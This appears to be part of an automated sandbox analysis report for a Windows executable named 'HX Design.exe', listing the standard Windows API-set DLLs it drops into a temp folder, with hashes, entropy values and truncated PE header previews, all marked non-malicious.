Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@.......6....`A........................................p...L............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20960
Entropy (8bit):	4.41968362445382
Encrypted:	false
SSDEEP:	192:lC+WvhWRWYnO/VWQ4SWHvD480Hy5qnajsBkffy2:4+WvhWRUGEslECl
MD5:	50ABF0A7EE67F00F247BADA185A7661C
SHA1:	0CDDAC9AC4DB3BF10A11D4B79085EF9CB3FB84A1
SHA-256:	F957A4C261506484B53534A9BE8931C02EC1A349B3F431A858F8215CECFEC3F7
SHA-512:	C2694BB5D103BAFF1264926A04D2F0FE156B8815A23C3748412A81CC307B71A9236A0E974B5549321014065E393D10228A0F0004DF9BA677F03B5D244A64B528
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.....v...v...v...~...v...v...v...r...v.....v...t...v.Rich..v.................PE..d.....mR.........." .........0...............................................@............`A........................................p................0...............0...!..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.615532076636106
Encrypted:	false
SSDEEP:	192:x91WthW/WEXCVWQ4OWNtu6bXKDUX01k9z3Alh1ELcNm:x91WthWU6tTbXpR9zq4cM
MD5:	4166D703ABC9C6DE65D5B269D3A5425E
SHA1:	16BCD7191312B94BDF38368D188E5A5CC479A36C
SHA-256:	0A351C2A2889A42886017E7DBCF75F45E3CB24D2F55E72205624272487E4A056
SHA-512:	F722DBA410CAB727C753E9CCE0BC47663E22F45828F5DF0BAC5BD6331497A2F15F6D9330B5203D3FF735F1CE6397E63C1B21D3EA6C5CEAB817B5F83EC296882B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....x..........." ...&.....0...............................................@............`A........................................p...`............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22072
Entropy (8bit):	4.723784724963796
Encrypted:	false
SSDEEP:	192:xHl4xlRWthWKWJWadJCsVWQ4KWrN3Lrp0KBQfX01k9z3A3WX2HR+HM:xF4xlRWthWnCseRxB+R9zcWXY+s
MD5:	993B5BC35DAC959BED58B77FE42AC77A
SHA1:	2ABAD159CBAB86FF423D6446143427DAAB751366
SHA-256:	B998FF8D173C34505E1D5984134282866DE910B09919CF9A322FCE760B75C80B
SHA-512:	CA19E949DCC8460AF53C9DAD17995A0CBFFD971BB731B7FCB53BB9384D227357926231C9FADFAA5AEF09055BEBAE9D5C23EE73EB6ECA04D6A52A3DF0847E10AB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....2.........." ...&.....0...............................................@......o~....`A........................................p................0...............0..8&..............p............................................................................rdata..\|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.648245476502366
Encrypted:	false
SSDEEP:	192:xf1W30WthWIWEXCVWQ4KWwkcADB6ZX01k9z3A5tXTV5KC:xw30WthWDRkcTR9z8VR
MD5:	0B65672B91C6A12D769DD777F810B149
SHA1:	2D527B45DCBE653A91E10365891C7E589F5E51E0
SHA-256:	C09EB307B2EB747B73C516267A99A23BB73204452326D41BDEB6F43598F6D62E
SHA-512:	F090BB0B8F3616CF2D77FF25523BC823918E1452F626A1298C95003DEF1867C785566A4E85CCD7F5A20F14631CAEC5DD392777DB2D00368C3FDF3597E0F51788
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@.......P....`A........................................p................0...............0..(&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.867148195183095
Encrypted:	false
SSDEEP:	192:xfTvuBL3BBLSWthWAWEXCVWQ4KWOTwKUWX01k9z3A6weTq:xfTvuBL3BEWthWbhk2R9zDwv
MD5:	259B4186004BB41E706DD781E29F5C5B
SHA1:	85751D31FE233ED51C46466F214F497D01BE8D87
SHA-256:	B3BA83880986F2522D05A88C52FE69EDA9C9FADBC5192A063E36BBA777CC877F
SHA-512:	F8A06252E96F40965668C978C4808305D424DE698F47F420643D713751926636F2049DD34C8156BA5BBBF5A5B2F4D5C19A978CF27D3AAEBD728D7A3DE8F0AFA2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...;Bq..........." ...&.....0...............................................@............`A........................................p................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	5.345678115600106
Encrypted:	false
SSDEEP:	384:xinaOMw3zdp3bwjGzue9/0jCRrndbwWthWods6YMTR9zFVJQMX:x3OMwBprwjGzue9/0jCRrndbjwg9zLJp
MD5:	4C26932F8F1F490017ADD31F5EC0A533
SHA1:	0DA01A7C89B506FE3FD939344BB51B976EFB3207
SHA-256:	DD3843C2E46B4E926C36150D614EFE02CA0EBC1F767F64F471568ADC35C2EF23
SHA-512:	EB2B87D187991FDC8E3A6577F20622D2D4A2A994DD375D8C27E1434CE786596533EACFBDE8714DB9959D88D6BCB91FDC8079C60C23F0EB920BA45C546A44E523
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...}i6..........." ...&.....0...............................................@......E.....`A........................................p................0...............0..@&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.761086240366231
Encrypted:	false
SSDEEP:	192:xsVWthWdWEXCVWQ4WWO6BzxOhJNlOCgX01k9z3Akfoc/wDb0:xsVWthWK36BzxIPaR9zvfJKb0
MD5:	41E0B7CB0EECBA317CF321B1ADA084D7
SHA1:	4CE1F13188FC00EB29C726717EAE489C524C1C8A
SHA-256:	DB978830B1FBCC0521582A6A79864B0FD83179248FA374926C8097BC02CD6383
SHA-512:	F0961CDE8DC83B845B2B91E42436ED8B42D2FB19CAAABF49B300FA9CBBAE9FAB84009B4714C3899AB4A703315A135A61E508DB29239D823A1CC11462CE6FFAB7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....n.g.........." ...&.....0...............................................@............`A........................................p...l............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.693773969089426
Encrypted:	false
SSDEEP:	192:x+WthWTWEXCVWQ4OWbxVXC4dlgX01k9z3AUjkOLdtPCH+:x+WthWoUxVXC4deR9zVjrLPqe
MD5:	7E751952F122F4E8BE1317087DC9DC71
SHA1:	F65884C8CFBB8AD565B3DF3A51AF11B1617C7092
SHA-256:	D078A9A9958A7C816DEA989BEF24F32BEFC6651AEA5E07F97A7B5D50DF73F799
SHA-512:	960922AC1309BDCF42D6900A0BEA30D4096D1411EC6A97F328520D4A59F71FC04E6F4A7B8D2B346012530329F76897607369C8E1ED1FE9C589D7F7682987C043
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....~.N.........." ...&.....0...............................................@............`A........................................p................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.879588348314022
Encrypted:	false
SSDEEP:	192:x88Fg9WthW2WEXCVWQ4OWkO8RwX01k9z3Avw0:xDFKWthWp69R9z4w0
MD5:	6D0762A2BA4263D0901CA7AAA0725C0C
SHA1:	E36D2D049116BD2D84121CDFA179098AC03650B4
SHA-256:	2EE9434CC5F40F4514C7284E14B90DB5C7A33000AFDA834D7C1DC063BAA3D805
SHA-512:	94616B2BFC0497CA2DBBC23C1AA4ECB04113A53D75FA570F6BB5E2561E5CDB940792E2CB290562133D226400C78D91377FDD312BA2858679084C66FF1AE9031D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@...........`A........................................p...H............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22096
Entropy (8bit):	5.2236952682399105
Encrypted:	false
SSDEEP:	192:xuMck1JzX9cKSI/WthWGWJWadJCsVWQ4WWfFQXINFPKBWX01k9z3AHVjjL0+HG:xDck1JzNcKSI/WthWDCsR8KER9zMVg+m
MD5:	ABAABC1DF36C7A0674F20FB83247FD71
SHA1:	345DB0FFEA0CB2531B79D464AD69347AC71EE2B9
SHA-256:	BA55F8481D8A9D225B8C430EB010F675250C5AFA64D9EEB15FF31DC159A19F5A
SHA-512:	7C01B8F46E9FBE08784066A9DF03723B3485FA714F22F4AB7E1CBE719B0A91AB1A5D597EF9D567836375DE929EA9397CE0685F00B908F3D0AA4D0288EB59F7BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....qm..........." ...&.....0...............................................@.......g....`A........................................p................0...............0..P&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21960
Entropy (8bit):	4.766496851793983
Encrypted:	false
SSDEEP:	192:x3IDfIe+WthWGWJWadJCsVWQ4iWoJtDoSJj+iX01k9z3A0FC3CHUrU:x3IDfIe+WthWDCsJtDX+iR9zHFC3C0rU
MD5:	A6776C201BAAE1DD6F88048D7747D14C
SHA1:	646119D2E440E6DAD0FFB0FE449AB4FC27F09FBE
SHA-256:	EE99AF71C347FF53C4E15109CB597759E657A3E859D9530680EEEA8BB0540112
SHA-512:	A9137AF8529FD96DBBA22C5179A16D112EC0BFAB9792BABE0A9F1CCA27408EFF73BA89F498CB5F941A5AA44555529EE10484E6CA4A3FBF1627523ACFDE622B45
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....x............" ...&.....0...............................................@............`A........................................p................0...............0...%..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.578458420956069
Encrypted:	false
SSDEEP:	192:xQYY/beLWthWsxWEXCVWQ4KWZTgY00pyEuX01k9z3AxMI2YcHv:xQYY/beLWthWsuogEpcR9zwrcP
MD5:	FB731A1F96C9E34347CBA5BB18E54581
SHA1:	88A62EDFBBD806B1043B4A1266C4708E1D47BE1D
SHA-256:	C4C1D381F419731C848E4A20AEF02A4436758935C9A274896228B9451956CC8E
SHA-512:	BE6C94D6015EDAE41FA0D6464C7DC5976ADBC3617E02B293B9A39E645EC173071F1F282959DDF264A133CE3B3BB9C434EB2E65FC607136F11D8EB07538168FFC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....\|..........." ...&.....0...............................................@......V.....`A........................................p................0...............0..(&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22072
Entropy (8bit):	4.745723861759547
Encrypted:	false
SSDEEP:	192:x6SGeV2WthWXWJWadJCsVWQ4KWBGkTehHssDX01k9z3AvjmJL7Du:x6SGeV2WthWOCsRkaFDR9zyjYLG
MD5:	8AAD6A3A2FE9052EF218D5C8CE1995E1
SHA1:	33748750E57CDC165FCDD186AE53003649607221
SHA-256:	E44D56D10EE14D4C4767A25839C2EF6826ADBEA3E15C2705B1D79676A63905B4
SHA-512:	841C70C63B243DEA68C2AC9CD886731B6171DCF76A60932191FB29402585D6BBFCC98D11868FC6032F08C29D8E0040A2B896C32C2FB4697BD54DEA2A52589AE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@......y`....`A........................................p...<............0...............0..8&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.655259252823291
Encrypted:	false
SSDEEP:	192:xE6yMvr8WthW+WEXCVWQ4iWJZhMgiZTOebR5X01k9z3ACRsgf45I:xE6yMvIWthWRCZ+9bt5R9zxRsvI
MD5:	2EBACBBDA70B888B1BCC5E816D14F3A2
SHA1:	EBF1763B0CEE267040312DECCB3DAD61AF1B9CF4
SHA-256:	96B11FA8ACA734F4B1DDEE377C84427D384F8E06AFFD99C63128797289FC9304
SHA-512:	AF15FC2B1FF31A3550AE4E9AE45F7BBE728D839B288D6DC5F04859E27463ED946D5B2619736223AE401CEE504E683B9FE9DFFB65754280644DDA91527EB46C5E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....~S..........." ...&.....0...............................................@............`A........................................p................0...............0..@&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	5.1327739610127425
Encrypted:	false
SSDEEP:	384:xUZwidv3V0dfpkXc0vVapwWthWVEi3au0R9zwpUbF:xOHdv3VqpkXc0vVaJGXKu49zbF
MD5:	87C57EDDF837C1E7AAADDB451D3D981E
SHA1:	5287AF84CA9CDFA928355C3C899A43051169A2FD
SHA-256:	E65305C73E3540491A0C62103764D50D827A13D749F76CB2AF593A800C93CF44
SHA-512:	0900608072D807082087275BD71061F7118534EA20D4CBD9B0E8190F500CD57FEABE0BF7F9FAC6438A7C4655AC405DD4EC17FD5F1A48B4F5DC70EB25E6F0E8AE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...ld............" ...&.....0...............................................@......z.....`A........................................p...X............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.820265064542297
Encrypted:	false
SSDEEP:	192:xMtZ3uWthWSWEXCVWQ4OWkguf8RwX01k9z3Avuqr:xMtZ3uWthWFVf9R9z4Lr
MD5:	2914EA20C9B8D79B1E98EA6B6DD85450
SHA1:	2E25617BB4F3F6391658B5778F5248D9E6762C6B
SHA-256:	047D09B49DAE9A101EB55277AA37C31390EA6C7187379B448122D77BD77BF005
SHA-512:	C0731AAECBCA9B70151E7630E0DBC7D744D534EFFE56AD703DF881F09C7820CB143873DBF95D57357D51BE44D53A3B9862D0C6483CA6C70AAD01A3F11350ABC9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...k............." ...&.....0...............................................@............`A........................................p...x............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21944
Entropy (8bit):	4.856010194095184
Encrypted:	false
SSDEEP:	192:xIgdKIMF6mayWthWkWEXCVWQ42WmrDoSJj+iX01k9z3A0FCzzY:xl37yWthWvxrDX+iR9zHFCHY
MD5:	E496D42D228B5E90C7B96350DBB1159C
SHA1:	746BA35A931E05AEBDA957608A6E28C1699237AA
SHA-256:	1FF617FB9D681551FB456AABAAE078C0AC7F96580AC1144EA441826A6D98CAEF
SHA-512:	CE555CB7FC0625D7568B002306E203E013F03127AAD7383CE26774CB1F1FA820F5FA6145DC9F5930B4D0791631BDBCE2EE2E4EE3EFA7720B1B2C413FF782E197
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....F.........." ...&.....0...............................................@.......<....`A........................................p...H............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.82505810266902
Encrypted:	false
SSDEEP:	192:xEVWthWQWEXCVWQ4WWjqYl6d3RX01k9z3AQvjc22sxGy9:xEVWthWL8qYlORR9zz4w9
MD5:	10D466341E7ECE8CF75B5D026105741B
SHA1:	31D1E9B9A4511156695B5AA33D65B6A36F8139C2
SHA-256:	5CE391EDB33C7055E724A4C3CECC64D16BA2AA4724CB99CD5AED00B0CECFBC82
SHA-512:	8778FD10C7360BD87DB048A2B2CA6603455FD8CB4D0E18709F106B55DB7CC92E7D6DC45385FF9DEF445B368376462E7D253442728D5E759FAA97299B67A59E21
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...z5............" ...&.....0...............................................@............`A........................................p...H............0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21944
Entropy (8bit):	4.5765948112646
Encrypted:	false
SSDEEP:	192:xYWgWthWkLWEXCVWQ4iWNbTseUfX01k9z3AwMwFg:xYWgWthWkAu/6fR9z3G
MD5:	8222B0F8BCF884433A55996253963A96
SHA1:	35914B003BBE6527E2479D7F897024915821500F
SHA-256:	7F18DC2971D15434BFE03C4842DCED10B466E849D782A1C8E398D96C2E2B12E2
SHA-512:	5E67B25AF8A1F23450CF8807135FEA1EC39DFE8FF7CD3858E492AE9E016A23967ED6009DA8868CD9DC87D583C3B7E6FB66D00BD48A7BBA6B0EEA638716514CC6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@............`A........................................p...<............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.908338281071753
Encrypted:	false
SSDEEP:	192:xM0sWthWhWEXCVWQ4iWa81BHX01k9z3ApO/DSiSp:xgWthW+bIBHR9zUO6p
MD5:	5BC2660D94760AF50F96B1999DE6CFAB
SHA1:	75DEC9B15BF9181F0E8015992B678BAC718D8C0B
SHA-256:	03BEBF73DF97BEED5DA608CAE73324DF2AAEC092277D53CE8C119031CF8E21FD
SHA-512:	7E9C67B5E46B35BA3F733110CF7FE35AC9DC1B41A4F7633180CD69631D1B82BCAC99F8B94B6F36A373F72BC4FD7EEAAC21A8FB51830914A32E19D738208CA636
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...n.;..........." ...&.....0...............................................@.......(....`A.........................................................0...............0..@&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26168
Entropy (8bit):	4.876426474332742
Encrypted:	false
SSDEEP:	192:x2tuJ9cyRWthWxWJWadJCsVWQ4mWEsLrp0KBQfX01k9z3A3WXngTwS:xayRWthWwCsMRxB+R9zcWXpS
MD5:	4BB011D3E58E958E94CA23AE05A8E958
SHA1:	741AF22136C1D6DCE03C75C68E977C05D76AC027
SHA-256:	06B0FD7E6D7CBE35177AF8FC17863F247BD5CAEE64543E3A9A125253D51AF777
SHA-512:	07668515AA4099C390CE30EF3415E412113483DA792D7CD02BB3DDCE561719E808D6BE81B90D599F4A7FA50BA27382C8D84ECB45292200BBA7094A5204FF7715
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....V............" ...&.....@...............................................P.......b....`A.........................................................@...............@..8&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.729270297531757
Encrypted:	false
SSDEEP:	192:xXUWthW2WEXCVWQ4OWTvzxwVIX01k9z3AyAIggcJ:xXUWthWpuxR9ztkXJ
MD5:	16A97489DAB15DB9B9713C53726F3411
SHA1:	C15AD01807955374283805104233BD56760B25C9
SHA-256:	9C06541D13C7088F313AAB0BE5AF20B72E583F34E442DF3D2FC29953640D4812
SHA-512:	54FFA278E4D0975830C1A8EFF9B7FC41D487CD9E8390D0E14F58CFF62EFADFC5816BCDA3CA11E2B1CBAEECB20546839593F7C6EA9500EEF433F299861D205822
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
